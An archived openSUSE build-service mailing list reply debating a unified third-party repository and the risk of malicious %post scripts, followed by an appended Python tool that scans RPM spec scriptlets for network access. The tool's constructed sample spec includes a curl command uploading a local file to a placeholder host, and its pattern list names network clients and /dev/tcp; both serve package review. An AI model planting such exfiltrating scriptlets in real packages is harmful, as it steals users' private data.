Mailinglist Archive: opensuse-buildservice (313 mails)

Re: [opensuse-buildservice] Integrating packages into Factory
  • From: "Archie Cobbs" <archie@xxxxxxxxxxxx>
  • Date: Tue, 29 Jul 2008 12:05:55 -0500
  • Message-id: <3bc8237c0807291005pd50fe4bn376c3745f31da2b8@xxxxxxxxxxxxxx>
On Tue, Jul 29, 2008 at 11:50 AM, Adrian Schröter <adrian@xxxxxxx> wrote:
>> So here's my suggestion. First, keep the three "levels of trust" we
>> have now: 1 = factory, 2 = established category projects like
>> network:telephony, Apache, etc., 3 = home:user projects.
>>
>> Next, with each release of SUSE, create the normal SUSE distribution
>> using level 1 stuff, but also create a new "3rd party distribution"
>> containing the union of all level 2 projects, taken as a snapshot at
>> release time. The "3rd party distribution" could be shipped as a
>> separate set of ISO images and would also be hosted in a *single*
>> online repository (called e.g., "openSUSE 10.3 3rdParty").

> This would have basically two effects:
>
> 1) The repository would cause plenty of conflicts, because we allow by
> intention that packagers replace/update packages. It would cause a real
> dependency hell when installing any package in YaST.

Yes, that is a potential problem. However, why should package X exist
in two different incarnations (not just _aggregate) in two different
projects (not counting home:user projects)? It seems like the
conflicts are caused by a separate underlying disorganization that
should be fixed and has nothing to do with how you split up repos.
Maybe I'm oversimplifying things?

> 2) Everybody would be able to inject evil code into everybody's system.
> (You do not even need to install a specific package; you would always
> get the package with a %post script sending your credit card credentials
> to someone else.) So no one should ever add this repo, simply because
> it is so easy a target that for sure plenty of people will do it.
>
> Seriously, I have seen often enough code in configure scripts talking with
> online servers and sending private data that I will never install software
> which is not trustable to some degree (or I have reviewed myself).

So... are you saying that projects like Apache and network:telephony
are not to be trusted? Then hmm, OBS just became a lot less useful to
the world.

Yes I agree there must be some kind of oversight to prevent evil %post
scripts. This is true of any open source project. Perhaps this is an
argument for setting up OSC commit mailing lists (like SVN commit
emails) for each OBS project, so other members of the project can
monitor changes... ?

In any case the trust question is an important one but is also a
separate one: if you can't trust Apache and network:telephony together
in one repository, then you can't trust them in two repositories
either. Orthogonal question.

So yes the trust equation needs to be figured out. But separate from
that, a single unified repository would be a lot more convenient,
trustworthy or not.

-Archie

--
Archie L. Cobbs
---------------------------------------------------------------------
To unsubscribe, e-mail: opensuse-buildservice+unsubscribe@xxxxxxxxxxxx
For additional commands, e-mail: opensuse-buildservice+help@xxxxxxxxxxxx
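Adrian's worry about a %post script that phones home and Archie's call for oversight of scriptlets both come down to someone reading the scriptlets before a package lands in a shared repository. The following Python review aid is an added example, not part of this thread and not code from OBS or osc: it pulls the scriptlet sections (%pre, %post, %preun, %postun, and friends) out of an RPM spec and flags lines that look like network access, so a project member watching commits can triage changes quickly. The spec text, the hostnames in it, and the pattern list are all constructed for the example; the patterns are a heuristic that shortens review, not a substitute for it.

```python
import re

# Constructed sample spec (not from any real package): one benign scriptlet
# and one %post that uploads a file to a remote host.
SAMPLE_SPEC = """\
Name:           example
Version:        1.0
Release:        1
Summary:        Constructed example package
License:        MIT

%description
Constructed example; see http://example.invalid for details.

%post
/sbin/ldconfig
curl -s http://collector.invalid/upload -d "$(cat ~/.cc)"

%postun
/sbin/ldconfig

%files
/usr/lib/libexample.so
"""

# Sections whose body rpm executes as root on the installing machine.
SCRIPTLET_SECTIONS = {
    "%pre", "%post", "%preun", "%postun", "%pretrans", "%posttrans",
    "%triggerin", "%triggerun", "%triggerpostun",
}

# Other section keywords, so we know when a scriptlet ends. Lines beginning
# with other %-words (macros like %{_bindir}, %if/%endif) are ordinary content.
SECTION_KEYWORDS = SCRIPTLET_SECTIONS | {
    "%description", "%package", "%prep", "%build", "%install", "%check",
    "%clean", "%files", "%changelog",
}

# Heuristic indicators of network access from a scriptlet (assumption: this
# list is illustrative, not a complete policy).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget|nc|ncat|netcat|ssh|scp|ftp)\b"), "network client"),
    (re.compile(r"/dev/(tcp|udp)/"), "bash network redirection"),
    (re.compile(r"\b(python|perl|ruby)\b.*\b(socket|urllib|http|LWP|Net::)"),
     "scripting-language network access"),
    (re.compile(r"https?://"), "URL literal"),
]


def extract_scriptlets(spec_text):
    """Return {section_header: [(lineno, text), ...]} for scriptlet sections only.

    The header is kept verbatim (e.g. "%post -n libexample") so scriptlets of
    different subpackages stay separate.
    """
    scriptlets = {}
    current = None
    for lineno, raw in enumerate(spec_text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("%"):
            keyword = line.split()[0]          # "%post -n sub" -> "%post"
            if keyword in SECTION_KEYWORDS:
                current = line if keyword in SCRIPTLET_SECTIONS else None
                if current is not None:
                    scriptlets.setdefault(current, [])
                continue
        if current is not None and line and not line.startswith("#"):
            scriptlets[current].append((lineno, line))
    return scriptlets


def scan_spec(spec_text):
    """Return [(section, lineno, reason, text)] for scriptlet lines that
    match a SUSPICIOUS pattern; one finding per line is enough for triage."""
    findings = []
    for section, lines in extract_scriptlets(spec_text).items():
        for lineno, text in lines:
            for pattern, reason in SUSPICIOUS:
                if pattern.search(text):
                    findings.append((section, lineno, reason, text))
                    break
    return findings


if __name__ == "__main__":
    for section, lineno, reason, text in scan_spec(SAMPLE_SPEC):
        print(f"{section} line {lineno}: {reason}: {text}")
```

Note that the URL in %description is not reported: only scriptlet bodies are scanned, which keeps the noise down when this runs over every commit to a project. A real deployment would feed it the spec from each osc commit notification and post the findings back to the project's members.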
